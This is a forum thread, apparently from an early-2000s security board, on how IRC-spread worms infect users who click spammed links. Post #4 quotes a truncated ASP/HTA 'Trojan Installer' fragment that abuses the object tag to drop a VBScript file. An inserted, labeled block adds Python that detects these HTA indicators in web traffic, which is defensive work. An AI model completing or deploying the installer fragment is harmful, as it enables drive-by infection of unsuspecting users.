Thread: "IRC" virii?

  1. #1

    "IRC" virii?

    Chances are, if you are a user of a large IRC network (such as DAL and EFnet), you will know what I'm talking about.

    Usually a user spams a website (eg: <sexc69> *** see me on webcam @ http://www.geocities.com/infected_site) to other users. The users, not knowing any better, click on the link and are infected -- they start spreading the link as well, usually without their knowledge.

    Although I have had contact with these things for quite a while, I have never actually "lived on the edge" and visited the spammed websites. I was wondering, then, exactly *how* does the client (usually mIRC) get infected through a simple click? Or have I missed something?

    Regards

  2. #2
    Syini666 (Purveyor of Lather), Join Date: Aug 2001, Posts: 553
    Most likely the site contains malicious code such as Java/JavaScript to attack the computer and get the virus onto the system. It can then join IRC servers and propagate itself in the very same fashion. A rather inexperienced user wouldn't really notice it, unless they had a firewall and could see the IRC traffic to servers they don't normally use. Another downside to these virii is that they can be designed to create a network for a DDoS attack, so not only has your computer become infected with a virus, but it's now being used to attack someone else and you get left holding the short end of the stick.

  3. #3
    Thanks,

    I thought that it might have something to do with Java/Javascript, but as I have never 'played' with it, I wouldn't know. Are there any effective ways to block malicious Java code (without disabling Javascript in the browser)?

  4. #4
    Senior Member, Join Date: Nov 2001, Posts: 4,785
    They're constantly making patches to block malicious java scripts, but new malicious scripts are written almost as fast, which exploit new holes found in browser security, which lately come out even faster.

    If you plan to surf sites you don't know, disable java scripts.

    Here's part of a malicious page that uses asp:


    <%
    ' Trojan Installer Written By Ethics
    ' Simple exploit of the Object tag
    ' Just put this file as the "data" value in an object tag

    '-----------------------------------------------
    ' make sure Nothing has gone to the client
    response.clear
    response.contenttype="application/hta"
    %>
    <HTML>
    <HEAD>
    <TITLE></TITLE>
    <HTA:APPLICATION ID="PsyBot"
    APPLICATIONNAME="PsyBotInstaller"
    BORDER="none"
    BORDERSTYLE="normal"
    CAPTION="no"
    ICON=""
    CONTEXTMENU="no"
    MAXIMIZEBUTTON="yes"
    MINIMIZEBUTTON="yes"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="no"
    SYSMENU="no"
    VERSION="1.0"
    WINDOWSTATE="minimize"/>

    <SCRIPT LANGUAGE="VBScript">
    MyFile = "c:\me.vbs"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    ...and the rest of the code

    Even though it's published as a 'proof of concept' (PoC), it can still do a lot of damage.
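Added example, not part of any post in this thread: a defender-side check a filtering proxy or log reviewer could run over HTTP responses, using only the indicators visible in the fragment quoted in post #4 (the `application/hta` content type, the `HTA:APPLICATION` element, the `Scripting.FileSystemObject` call, and the object tag's `data` value). The function name, class name, finding labels and sample responses are assumptions made up for illustration.

```python
import re
from html.parser import HTMLParser

# Indicators taken from the page fragment quoted in post #4.
HTA_MIME = "application/hta"
HTA_TAG = re.compile(r"<\s*hta:application\b", re.I)
FSO_CALL = re.compile(r"createobject\s*\(\s*[\"']scripting\.filesystemobject[\"']", re.I)


class ObjectDataCollector(HTMLParser):
    """Collect the data= attribute of every <object> tag in a page."""
    def __init__(self):
        super().__init__()
        self.data_urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "object":  # HTMLParser lowercases tag and attribute names
            self.data_urls += [v for k, v in attrs if k == "data" and v]


def inspect_response(headers, body):
    """Return a sorted list of findings for one HTTP response (hypothetical labels)."""
    findings = set()
    ctype = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    if ctype.split(";")[0].strip().lower() == HTA_MIME:
        findings.add("hta-content-type")
    if HTA_TAG.search(body):
        findings.add("hta-application-tag")
    if FSO_CALL.search(body):
        findings.add("filesystemobject-script")
    collector = ObjectDataCollector()
    collector.feed(body)
    # An <object data=...> is only a lead: it names the URL whose response to inspect next.
    findings.update("object-data:" + url for url in collector.data_urls)
    return sorted(findings)


# Constructed samples (not captured traffic): embedding page, payload response, benign page.
EMBED = ({"Content-Type": "text/html"},
         '<html><body><OBJECT DATA="installer.asp"></OBJECT></body></html>')
PAYLOAD = ({"content-type": "Application/HTA; charset=utf-8"},
           '<HTML><HEAD><HTA:APPLICATION ID="x" WINDOWSTATE="minimize"/>\n'
           '<SCRIPT LANGUAGE="VBScript">Set FSO = CreateObject("Scripting.FileSystemObject")')
BENIGN = ({"Content-Type": "text/html"}, "<html><body><p>hello</p></body></html>")


if __name__ == "__main__":
    for hdrs, body in (EMBED, PAYLOAD, BENIGN):
        print(inspect_response(hdrs, body))
```

Blocking or alerting on the `hta-content-type` finding for web-origin responses addresses the question in post #3 without turning off scripting in the browser.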

  5. #5
    Thanks for the example and information, Tedob1/Syni666
